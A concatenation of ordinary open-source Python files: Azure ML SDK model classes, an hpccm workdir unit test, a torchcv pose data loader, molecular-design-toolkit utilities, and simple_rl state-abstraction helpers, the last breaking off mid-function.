:type private_key_data: str
"""
_attribute_map = {
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
'public_key_data': {'key': 'publicKeyData', 'type': 'str'},
'private_key_data': {'key': 'privateKeyData', 'type': 'str'},
}
def __init__(
self,
*,
username: Optional[str] = None,
password: Optional[str] = None,
public_key_data: Optional[str] = None,
private_key_data: Optional[str] = None,
**kwargs
):
super(VirtualMachineSshCredentials, self).__init__(**kwargs)
self.username = username
self.password = password
self.public_key_data = public_key_data
self.private_key_data = private_key_data
class Workspace(Resource):
"""An object that represents a machine learning workspace.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar workspace_id: The immutable id associated with this workspace.
:vartype workspace_id: str
:param description: The description of this workspace.
:type description: str
:param friendly_name: The friendly name for this workspace. This name in mutable.
:type friendly_name: str
:ivar creation_time: The creation time of the machine learning workspace in ISO8601 format.
:vartype creation_time: ~datetime.datetime
:param key_vault: ARM id of the key vault associated with this workspace. This cannot be
changed once the workspace has been created.
:type key_vault: str
:param application_insights: ARM id of the application insights associated with this workspace.
This cannot be changed once the workspace has been created.
:type application_insights: str
:param container_registry: ARM id of the container registry associated with this workspace.
This cannot be changed once the workspace has been created.
:type container_registry: str
:param storage_account: ARM id of the storage account associated with this workspace. This
cannot be changed once the workspace has been created.
:type storage_account: str
:param discovery_url: Url for the discovery service to identify regional endpoints for machine
learning experimentation services.
:type discovery_url: str
:ivar provisioning_state: The current deployment state of workspace resource. The
provisioningState is to indicate states for resource provisioning. Possible values include:
"Unknown", "Updating", "Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param encryption: The encryption settings of Azure ML workspace.
:type encryption: ~azure.mgmt.machinelearningservices.models.EncryptionProperty
:param hbi_workspace: The flag to signal HBI data in the workspace and reduce diagnostic data
collected by the service.
:type hbi_workspace: bool
:ivar service_provisioned_resource_group: The name of the managed resource group created by
workspace RP in customer subscription if the workspace is CMK workspace.
:vartype service_provisioned_resource_group: str
:ivar private_link_count: Count of private connections in the workspace.
:vartype private_link_count: int
:param image_build_compute: The compute name for image build.
:type image_build_compute: str
:param allow_public_access_when_behind_vnet: The flag to indicate whether to allow public
access when behind VNet.
:type allow_public_access_when_behind_vnet: bool
:ivar private_endpoint_connections: The list of private endpoint connections in the workspace.
:vartype private_endpoint_connections:
list[~azure.mgmt.machinelearningservices.models.PrivateEndpointConnection]
:param shared_private_link_resources: The list of shared private link resources in this
workspace.
:type shared_private_link_resources:
list[~azure.mgmt.machinelearningservices.models.SharedPrivateLinkResource]
:ivar notebook_info: The notebook info of Azure ML workspace.
:vartype notebook_info: ~azure.mgmt.machinelearningservices.models.NotebookResourceInfo
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'workspace_id': {'readonly': True},
'creation_time': {'readonly': True},
'provisioning_state': {'readonly': True},
'service_provisioned_resource_group': {'readonly': True},
'private_link_count': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
'notebook_info': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'workspace_id': {'key': 'properties.workspaceId', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'friendly_name': {'key': 'properties.friendlyName', 'type': 'str'},
'creation_time': {'key': 'properties.creationTime', 'type': 'iso-8601'},
'key_vault': {'key': 'properties.keyVault', 'type': 'str'},
'application_insights': {'key': 'properties.applicationInsights', 'type': 'str'},
'container_registry': {'key': 'properties.containerRegistry', 'type': 'str'},
'storage_account': {'key': 'properties.storageAccount', 'type': 'str'},
'discovery_url': {'key': 'properties.discoveryUrl', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'encryption': {'key': 'properties.encryption', 'type': 'EncryptionProperty'},
'hbi_workspace': {'key': 'properties.hbiWorkspace', 'type': 'bool'},
'service_provisioned_resource_group': {'key': 'properties.serviceProvisionedResourceGroup', 'type': 'str'},
'private_link_count': {'key': 'properties.privateLinkCount', 'type': 'int'},
'image_build_compute': {'key': 'properties.imageBuildCompute', 'type': 'str'},
'allow_public_access_when_behind_vnet': {'key': 'properties.allowPublicAccessWhenBehindVnet', 'type': 'bool'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
'shared_private_link_resources': {'key': 'properties.sharedPrivateLinkResources', 'type': '[SharedPrivateLinkResource]'},
'notebook_info': {'key': 'properties.notebookInfo', 'type': 'NotebookResourceInfo'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
description: Optional[str] = None,
friendly_name: Optional[str] = None,
key_vault: Optional[str] = None,
application_insights: Optional[str] = None,
container_registry: Optional[str] = None,
storage_account: Optional[str] = None,
discovery_url: Optional[str] = None,
encryption: Optional["EncryptionProperty"] = None,
hbi_workspace: Optional[bool] = False,
image_build_compute: Optional[str] = None,
allow_public_access_when_behind_vnet: Optional[bool] = False,
shared_private_link_resources: Optional[List["SharedPrivateLinkResource"]] = None,
**kwargs
):
super(Workspace, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.workspace_id = None
self.description = description
self.friendly_name = friendly_name
self.creation_time = None
self.key_vault = key_vault
self.application_insights = application_insights
self.container_registry = container_registry
self.storage_account = storage_account
self.discovery_url = discovery_url
self.provisioning_state = None
self.encryption = encryption
self.hbi_workspace = hbi_workspace
self.service_provisioned_resource_group = None
self.private_link_count = None
self.image_build_compute = image_build_compute
self.allow_public_access_when_behind_vnet = allow_public_access_when_behind_vnet
self.private_endpoint_connections = None
self.shared_private_link_resources = shared_private_link_resources
self.notebook_info = None
class WorkspaceConnection(msrest.serialization.Model):
"""Workspace connection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the workspace connection.
:vartype id: str
:ivar name: Friendly name of the workspace connection.
:vartype name: str
:ivar type: Resource type of workspace connection.
:vartype type: str
:param category: Category of the workspace connection.
:type category: str
:param target: Target of the workspace connection.
:type target: str
:param auth_type: Authorization type of the workspace connection.
:type auth_type: str
:param value: Value details of the workspace connection.
:type value: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'category': {'key': 'properties.category', 'type': 'str'},
'target': {'key': 'properties.target', 'type': 'str'},
'auth_type': {'key': 'properties.authType', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
def __init__(
self,
*,
category: Optional[str] = None,
target: Optional[str] = None,
auth_type: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(WorkspaceConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.category = category
self.target = target
self.auth_type = auth_type
self.value = value
class WorkspaceConnectionDto(msrest.serialization.Model):
"""object used for creating workspace connection.
:param name: Friendly name of the workspace connection.
:type name: str
:param category: Category of the workspace connection.
:type category: str
:param target: Target of the workspace connection.
:type target: str
:param auth_type: Authorization type of the workspace connection.
:type auth_type: str
:param value: Value details of the workspace connection.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'category': {'key': 'properties.category', 'type': 'str'},
'target': {'key': 'properties.target', 'type': 'str'},
'auth_type': {'key': 'properties.authType', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
category: Optional[str] = None,
target: Optional[str] = None,
auth_type: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(WorkspaceConnectionDto, self).__init__(**kwargs)
self.name = name
self.category = category
self.target = target
self.auth_type = auth_type
self.value = value
class WorkspaceListResult(msrest.serialization.Model):
"""The result of a request to list machine learning workspaces.
:param value: The list of machine learning workspaces. Since this list may be incomplete, the
nextLink field should be used to request the next list of machine learning workspaces.
:type value: list[~azure.mgmt.machinelearningservices.models.Workspace]
:param next_link: The URI that can be used to request the next list of machine learning
workspaces.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Workspace]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["Workspace"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(WorkspaceListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class WorkspaceSku(msrest.serialization.Model):
"""AML workspace sku information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar resource_type:
:vartype resource_type: str
:ivar skus: The list of workspace sku settings.
:vartype skus: list[~azure.mgmt.machinelearningservices.models.SkuSettings]
"""
_validation = {
'resource_type': {'readonly': True},
'skus': {'readonly': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'skus': {'key': 'skus', 'type': '[SkuSettings]'},
}
def __init__(
self,
**kwargs
):
super(WorkspaceSku, self).__init__(**kwargs)
self.resource_type = None
self.skus = None
class WorkspaceUpdateParameters(msrest.serialization.Model):
"""The parameters for updating a machine learning workspace.
:param tags: A set of tags. The resource tags for the machine learning workspace.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:param description: The description of this workspace.
:type description: str
:param friendly_name: The friendly name for this workspace.
:type friendly_name: str
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'friendly_name': {'key': 'properties.friendlyName', 'type': 'str'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
description: Optional[str] = None,
friendly_name: Optional[str] = None,
**kwargs
):
super(WorkspaceUpdateParameters, self).__init__(**kwargs)
self.tags = tags
self.sku = sku
self.description = description
self.friendly_name = friendly_name
|
test/test_workdir.py
|
robertmaynard/hpc-container-maker
| 340 |
129369
|
<gh_stars>100-1000
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=invalid-name, too-few-public-methods
"""Test cases for the workdir module"""
from __future__ import unicode_literals
from __future__ import print_function
import logging # pylint: disable=unused-import
import unittest
from helpers import bash, docker, invalid_ctype, singularity
from hpccm.primitives.workdir import workdir
class Test_workdir(unittest.TestCase):
def setUp(self):
"""Disable logging output messages"""
logging.disable(logging.ERROR)
@docker
def test_empty(self):
"""No workdir specified"""
w = workdir()
self.assertEqual(str(w), '')
@invalid_ctype
def test_invalid_ctype(self):
"""Invalid container type specified"""
w = workdir(directory='foo')
with self.assertRaises(RuntimeError):
str(w)
@docker
def test_dir_docker(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), 'WORKDIR foo')
@singularity
def test_dir_singularity(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), '%post\n cd /\n mkdir -p foo\n cd foo')
@bash
def test_dir_bash(self):
"""Working directory specified"""
w = workdir(directory='foo')
self.assertEqual(str(w), '')
|
data/pose/data_loader.py
|
qrsforever/torchcv
| 171 |
129385
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: <NAME>(<EMAIL>)
# Class for the Pose Data Loader.
from torch.utils import data
import lib.data.pil_aug_transforms as pil_aug_trans
import lib.data.cv2_aug_transforms as cv2_aug_trans
import lib.data.transforms as trans
from lib.data.collate import collate
from lib.tools.util.logger import Logger as Log
from data.pose.datasets.default_cpm_dataset import DefaultCPMDataset
from data.pose.datasets.default_openpose_dataset import DefaultOpenPoseDataset
class DataLoader(object):
def __init__(self, configer):
self.configer = configer
if self.configer.get('data', 'image_tool') == 'pil':
self.aug_train_transform = pil_aug_trans.PILAugCompose(self.configer, split='train')
elif self.configer.get('data', 'image_tool') == 'cv2':
self.aug_train_transform = cv2_aug_trans.CV2AugCompose(self.configer, split='train')
else:
Log.error('Not support {} image tool.'.format(self.configer.get('data', 'image_tool')))
exit(1)
if self.configer.get('data', 'image_tool') == 'pil':
self.aug_val_transform = pil_aug_trans.PILAugCompose(self.configer, split='val')
elif self.configer.get('data', 'image_tool') == 'cv2':
self.aug_val_transform = cv2_aug_trans.CV2AugCompose(self.configer, split='val')
else:
Log.error('Not support {} image tool.'.format(self.configer.get('data', 'image_tool')))
exit(1)
self.img_transform = trans.Compose([
trans.ToTensor(),
trans.Normalize(**self.configer.get('data', 'normalize')), ])
def get_trainloader(self):
if self.configer.get('dataset', default=None) == 'default_cpm':
dataset = DefaultCPMDataset(root_dir=self.configer.get('data', 'data_dir'), dataset='train',
aug_transform=self.aug_train_transform,
img_transform=self.img_transform,
configer=self.configer)
elif self.configer.get('dataset', default=None) == 'default_openpose':
dataset = DefaultOpenPoseDataset(root_dir=self.configer.get('data', 'data_dir'), dataset='train',
aug_transform=self.aug_train_transform,
img_transform=self.img_transform,
configer=self.configer)
else:
Log.error('{} dataset is invalid.'.format(self.configer.get('dataset', default=None)))
exit(1)
trainloader = data.DataLoader(
dataset,
batch_size=self.configer.get('train', 'batch_size'), shuffle=True,
num_workers=self.configer.get('data', 'workers'), pin_memory=True,
drop_last=self.configer.get('data', 'drop_last'),
collate_fn=lambda *args: collate(
*args, trans_dict=self.configer.get('train', 'data_transformer')
)
)
return trainloader
def get_valloader(self, dataset=None):
dataset = 'val' if dataset is None else dataset
if self.configer.get('dataset', default=None) == 'default_cpm':
dataset = DefaultCPMDataset(root_dir=self.configer.get('data', 'data_dir'), dataset=dataset,
aug_transform=self.aug_val_transform,
img_transform=self.img_transform,
configer=self.configer)
elif self.configer.get('dataset', default=None) == 'default_openpose':
dataset = DefaultOpenPoseDataset(root_dir=self.configer.get('data', 'data_dir'), dataset=dataset,
aug_transform=self.aug_val_transform,
img_transform=self.img_transform,
configer=self.configer),
else:
Log.error('{} dataset is invalid.'.format(self.configer.get('dataset')))
exit(1)
valloader = data.DataLoader(
dataset,
batch_size=self.configer.get('val', 'batch_size'), shuffle=False,
num_workers=self.configer.get('data', 'workers'), pin_memory=True,
collate_fn=lambda *args: collate(
*args, trans_dict=self.configer.get('val', 'data_transformer')
)
)
return valloader
if __name__ == "__main__":
# Test data loader.
pass
|
moldesign/utils/utils.py
|
Autodesk/molecular-design-toolkit
| 147 |
129401
|
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
import future.utils
from functools import reduce
import fractions
import operator
import os
import re
import sys
import tempfile
from html.parser import HTMLParser
def make_none(*args, **kwargs):
return None
def if_not_none(item, default):
""" Equivalent to `item if item is not None else default` """
if item is None:
return default
else:
return item
class MLStripper(HTMLParser):
""" Strips markup language tags from a string.
FROM http://stackoverflow.com/a/925630/1958900
"""
def __init__(self):
if not future.utils.PY2:
super().__init__()
self.reset()
self.fed = []
self.strict = False
self.convert_charrefs = True
def handle_data(self, d):
self.fed.append(d)
def get_data(self):
return ''.join(self.fed)
def html_to_text(html):
"""
FROM http://stackoverflow.com/a/925630/1958900
"""
s = MLStripper()
s.unescape = True # convert HTML entities to text
s.feed(html)
return s.get_data()
def printflush(s, newline=True):
if newline:
print(s)
else:
print(s, end=' ')
sys.stdout.flush()
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
Note:
Copied without modification from Python 3.6.1 ``shutil.which`
source code
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
class methodcaller(object):
"""The pickleable implementation of the standard library operator.methodcaller.
This was copied without modification from:
https://github.com/python/cpython/blob/065990fa5bd30fb3ca61b90adebc7d8cb3f16b5a/Lib/operator.py
The c-extension version is not pickleable, so we keep a copy of the pure-python standard library
code here. See https://bugs.python.org/issue22955
Original documentation:
Return a callable object that calls the given method on its operand.
After f = methodcaller('name'), the call f(r) returns r.name().
After g = methodcaller('name', 'date', foo=1), the call g(r) returns
r.name('date', foo=1).
"""
__slots__ = ('_name', '_args', '_kwargs')
def __init__(*args, **kwargs):
if len(args) < 2:
msg = "methodcaller needs at least one argument, the method name"
raise TypeError(msg)
self = args[0]
self._name = args[1]
if not isinstance(self._name, future.utils.native_str):
raise TypeError('method name must be a string')
self._args = args[2:]
self._kwargs = kwargs
def __call__(self, obj):
return getattr(obj, self._name)(*self._args, **self._kwargs)
def __repr__(self):
args = [repr(self._name)]
args.extend(list(map(repr, self._args)))
args.extend('%s=%r' % (k, v) for k, v in list(self._kwargs.items()))
return '%s.%s(%s)' % (self.__class__.__module__,
self.__class__.__name__,
', '.join(args))
def __reduce__(self):
if not self._kwargs:
return self.__class__, (self._name,) + self._args
else:
from functools import partial
return partial(self.__class__, self._name, **self._kwargs), self._args
class textnotify(object):
""" Print a single, immediately flushed line to log the execution of a block.
Prints 'done' at the end of the line (or 'ERROR' if an uncaught exception)
Examples:
>>> import time
>>> with textnotify('starting to sleep'):
>>> time.sleep(3)
starting to sleep...done
>>> with textnotify('raising an exception...'):
>>> raise ValueError()
raising an exception...error
ValueError [...]
"""
def __init__(self, startmsg):
if startmsg.strip()[-3:] != '...':
startmsg = startmsg.strip() + '...'
self.startmsg = startmsg
def __enter__(self):
printflush(self.startmsg, newline=False)
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
printflush('done')
else:
printflush('ERROR')
class BaseTable(object):
def __init__(self, categories, fileobj=None):
self.categories = categories
self.lines = []
self.fileobj = fileobj
def add_line(self, obj):
if hasattr(obj, 'keys'):
newline = [obj.get(cat, '') for cat in self.categories]
else:
assert len(obj) == len(self.categories)
newline = obj
self.lines.append(newline)
self.writeline(newline)
def writeline(self, newline):
raise NotImplementedError()
def getstring(self):
raise NotImplementedError()
class MarkdownTable(BaseTable):
def __init__(self, *categories):
super().__init__(categories)
def markdown(self, replace=None):
if replace is None: replace = {}
outlines = ['| ' + ' | '.join(self.categories) + ' |',
'|-' + ''.join('|-' for x in self.categories) + '|']
for line in self.lines:
nextline = [str(replace.get(val, val)) for val in line]
outlines.append('| ' + ' | '.join(nextline) + ' |')
return '\n'.join(outlines)
def writeline(self, newline):
pass
def getstring(self):
return self.markdown()
def binomial_coefficient(n, k):
# credit to http://stackoverflow.com/users/226086/nas-banov
return int(reduce(operator.mul,
(fractions.Fraction(n - i, i + 1) for i in range(k)), 1))
def pairwise_displacements(a):
"""
:type a: numpy.array
from http://stackoverflow.com/questions/22390418/pairwise-displacement-vectors-among-set-of-points
"""
import numpy as np
n = a.shape[0]
d = a.shape[1]
c = binomial_coefficient(n, 2)
out = np.zeros((c, d))
l = 0
r = l + n - 1
for sl in range(1, n): # no point1 - point1!
out[l:r] = a[:n - sl] - a[sl:]
l = r
r += n - (sl + 1)
return out
def is_printable(s):
import string
for c in s:
if c not in string.printable:
return False
else:
return True
class _RedirectStream(object):
"""From python3.4 stdlib
"""
_stream = None
def __init__(self, new_target):
self._new_target = new_target
# We use a list of old targets to make this CM re-entrant
self._old_targets = []
def __enter__(self):
self._old_targets.append(getattr(sys, self._stream))
setattr(sys, self._stream, self._new_target)
return self._new_target
def __exit__(self, exctype, excinst, exctb):
setattr(sys, self._stream, self._old_targets.pop())
class redirect_stderr(_RedirectStream):
"""From python3.4 stdlib"""
_stream = "stderr"
GETFLOAT = re.compile(r'-?\d+(\.\d+)?(e[-+]?\d+)') # matches numbers, e.g. 1, -2.0, 3.5e50, 0.001e-10
def from_filepath(func, filelike):
"""Run func on a temporary *path* assigned to filelike"""
if type(filelike) == str:
return func(filelike)
else:
with tempfile.NamedTemporaryFile() as outfile:
outfile.write(filelike.read().encode()) # hack - prob need to detect bytes
outfile.flush()
result = func(outfile.name)
return result
|
simple_rl/abstraction/state_abs/sa_helpers.py
|
david-abel/mdps
| 230 |
129418
|
<reponame>david-abel/mdps
# Python imports.
from __future__ import print_function
from collections import defaultdict
import sys
import random
import itertools
# Other imports.
from simple_rl.planning.ValueIterationClass import ValueIteration
from simple_rl.mdp import State
from simple_rl.mdp import MDPDistribution
from simple_rl.abstraction.state_abs import indicator_funcs as ind_funcs
from simple_rl.abstraction.state_abs.StateAbstractionClass import StateAbstraction
def merge_state_abstr(list_of_state_abstr, states):
'''
Args:
list_of_state_abstr (list)
states (list)
Returns:
(simple_rl.StateAbstraction)
Summary:
Merges all state abstractions in @list_of_state_abstr by taking the
intersection over safe clusterability.
'''
safe_state_pairings = defaultdict(list)
# For each state pair...
for s_1, s_2 in itertools.product(states, repeat=2):
safely_clustered_pair = True
for state_abstr in list_of_state_abstr:
if state_abstr.phi(s_1) != state_abstr.phi(s_2):
safely_clustered_pair = False
break
if safely_clustered_pair:
safe_state_pairings[s_1] += [s_2]
safe_state_pairings[s_2] += [s_1]
# Now we have a dict of safe state pairs, merge them.
phi = defaultdict(list)
cluster_counter = 0
for state in safe_state_pairings.keys():
for safe_other_state in safe_state_pairings[state]:
if state not in phi.keys() and safe_other_state not in phi.keys():
phi[state] = State(cluster_counter)
phi[safe_other_state] = State(cluster_counter)
elif state in phi.keys():
phi[safe_other_state] = phi[state]
elif safe_other_state in phi.keys():
phi[state] = phi[safe_other_state]
# Increment counter
cluster_counter += 1
return StateAbstraction(phi, states)
def make_sa(mdp, indic_func=ind_funcs._q_eps_approx_indicator, state_class=State, epsilon=0.0, save=False, track_act_opt_pr=False):
'''
Args:
mdp (MDP)
state_class (Class)
epsilon (float)
Summary:
Creates and saves a state abstraction.
'''
print(" Making state abstraction... ")
q_equiv_sa = StateAbstraction(phi={}, track_act_opt_pr=track_act_opt_pr)
if isinstance(mdp, MDPDistribution):
q_equiv_sa = make_multitask_sa(mdp, state_class=state_class, indic_func=indic_func, epsilon=epsilon, track_act_opt_pr=track_act_opt_pr)
else:
q_equiv_sa = make_singletask_sa(mdp, state_class=state_class, indic_func=indic_func, epsilon=epsilon, track_act_opt_pr=track_act_opt_pr)
if save:
save_sa(q_equiv_sa, str(mdp) + ".p")
return q_equiv_sa
def make_multitask_sa(mdp_distr, state_class=State, indic_func=ind_funcs._q_eps_approx_indicator, epsilon=0.0, aa_single_act=True, track_act_opt_pr=False):
'''
Args:
mdp_distr (MDPDistribution)
state_class (Class)
indicator_func (S x S --> {0,1})
epsilon (float)
aa_single_act (bool): If we should track optimal actions.
Returns:
(StateAbstraction)
'''
sa_list = []
for mdp in mdp_distr.get_mdps():
sa = make_singletask_sa(mdp, indic_func, state_class, epsilon, aa_single_act=aa_single_act, prob_of_mdp=mdp_distr.get_prob_of_mdp(mdp), track_act_opt_pr=track_act_opt_pr)
sa_list += [sa]
mdp = mdp_distr.get_all_mdps()[0]
vi = ValueIteration(mdp)
ground_states = vi.get_states()
multitask_sa = merge_state_abstr(sa_list, ground_states)
return multitask_sa
def make_singletask_sa(mdp, indic_func, state_class, epsilon=0.0, aa_single_act=False, prob_of_mdp=1.0, track_act_opt_pr=False):
'''
Args:
mdp (MDP)
indic_func (S x S --> {0,1})
state_class (Class)
epsilon (float)
Returns:
(StateAbstraction)
'''
print("\tRunning VI...",)
sys.stdout.flush()
# Run VI
if isinstance(mdp, MDPDistribution):
mdp = mdp.sample()
vi = ValueIteration(mdp)
iters, val = vi.run_vi()
print(" done.")
print("\tMaking state abstraction...",)
sys.stdout.flush()
sa = StateAbstraction(phi={}, state_class=state_class, track_act_opt_pr=track_act_opt_pr)
clusters = defaultdict(list)
num_states = len(vi.get_states())
actions = mdp.get_actions()
# Find state pairs that satisfy the condition.
for i, state_x in enumerate(vi.get_states()):
sys.stdout.flush()
clusters[state_x] = [state_x]
for state_y in vi.get_states()[i:]:
if not (state_x == state_y) and indic_func(state_x, state_y, vi, actions, epsilon=epsilon):
clusters[state_x].append(state_y)
clusters[state_y].append(state_x)
print("making clusters...",)
sys.stdout.flush()
# Build SA.
for i, state in enumerate(clusters.keys()):
new_cluster = clusters[state]
sa.make_cluster(new_cluster)
# Destroy old so we don't double up.
for s in clusters[state]:
if s in clusters.keys():
clusters.pop(s)
if aa_single_act:
# Put all optimal actions in a set associated with the ground state.
for ground_s in sa.get_ground_states():
a_star_set = set(vi.get_max_q_actions(ground_s))
sa.set_actions_state_opt_dict(ground_s, a_star_set, prob_of_mdp)
print(" done.")
print("\tGround States:", num_states)
print("\tAbstract:", sa.get_num_abstr_states())
print()
return sa
def visualize_state_abstr_grid(grid_mdp, state_abstr, scr_width=720, scr_height=720):
'''
Args:
grid_mdp (GridWorldMDP)
state_abstr (StateAbstraction)
Summary:
Visualizes the state abstraction.
'''
import pygame
from simple_rl.utils import mdp_visualizer
pygame.init()
title_font = pygame.font.SysFont("CMU Serif", 32)
small_font = pygame.font.SysFont("CMU Serif", 22)
if isinstance(grid_mdp, MDPDistribution):
goal_locs = set([])
for m in grid_mdp.get_all_mdps():
for g in m.get_goal_locs():
goal_locs.add(g)
grid_mdp = grid_mdp.sample()
else:
goal_locs = grid_mdp.get_goal_locs()
# Pygame init.
screen = pygame.display.set_mode((scr_width, scr_height))
pygame.init()
screen.fill((255, 255, 255))
pygame.display.update()
mdp_visualizer._draw_title_text(grid_mdp, screen)
# Prep some dimensions to make drawing easier.
scr_width, scr_height = screen.get_width(), screen.get_height()
width_buffer = scr_width / 10.0
height_buffer = 30 + (scr_height / 10.0) # Add 30 for title.
cell_width = (scr_width - width_buffer * 2) / grid_mdp.width
cell_height = (scr_height - height_buffer * 2) / grid_mdp.height
font_size = int(min(cell_width, cell_height) / 4.0)
reg_font = pygame.font.SysFont("CMU Serif", font_size)
cc_font = pygame.font.SysFont("Courier", font_size*2 + 2)
# Setup states to compute abstr states later.
state_dict = defaultdict(lambda : defaultdict(bool))
for s in state_abstr.get_ground_states():
state_dict[s.x][s.y] = s
# Grab colors.
from simple_rl.utils.chart_utils import color_ls
sa_colors = color_ls
abstr_states = state_abstr.get_abs_states()
non_singleton_abstr_states = [s_phi for s_phi in abstr_states if len(state_abstr.get_ground_states_in_abs_state(s_phi)) > 1]
new_color_index = 0
while len(non_singleton_abstr_states) > len(sa_colors):
next_new_color_variant = color_ls[new_color_index]
rand_color = [min(max(color_channel + random.randint(-30,30), 0), 255) for color_channel in next_new_color_variant]
sa_colors.append(rand_color)
new_color_index += 1
color_index = 0
abstr_state_color_dict = {}
# For each row:
for i in range(grid_mdp.width):
# For each column:
for j in range(grid_mdp.height):
if not state_dict[i+1][grid_mdp.height - j]:
# An unreachable state.
continue
# Draw the abstract state colors.
top_left_point = width_buffer + cell_width*i, height_buffer + cell_height*j
s = state_dict[i+1][grid_mdp.height - j]
abs_state = state_abstr.phi(s)
cluster_num = abs_state.data
is_singleton = abs_state not in non_singleton_abstr_states
# Grab next color if we haven't assigned a color yet.
if not is_singleton and abs_state.data not in abstr_state_color_dict.keys():
abstr_state_color_dict[abs_state.data] = color_index
color_index += 1
r = pygame.draw.rect(screen, (46, 49, 49), top_left_point + (cell_width, cell_height), 3)
if not is_singleton:
abstr_state_color = sa_colors[abstr_state_color_dict[abs_state.data] % len(sa_colors)]
r = pygame.draw.rect(screen, abstr_state_color, (top_left_point[0] + 5, top_left_point[1] + 5) + (cell_width-10, cell_height-10), 0)
# else:
# top_left_point = width_buffer + cell_width*i, height_buffer + cell_height*j
# r = pygame.draw.rect(screen, (46, 49, 49), top_left_point + (cell_width, cell_height), 3)
if grid_mdp.is_wall(i+1, grid_mdp.height - j):
# Draw the walls.
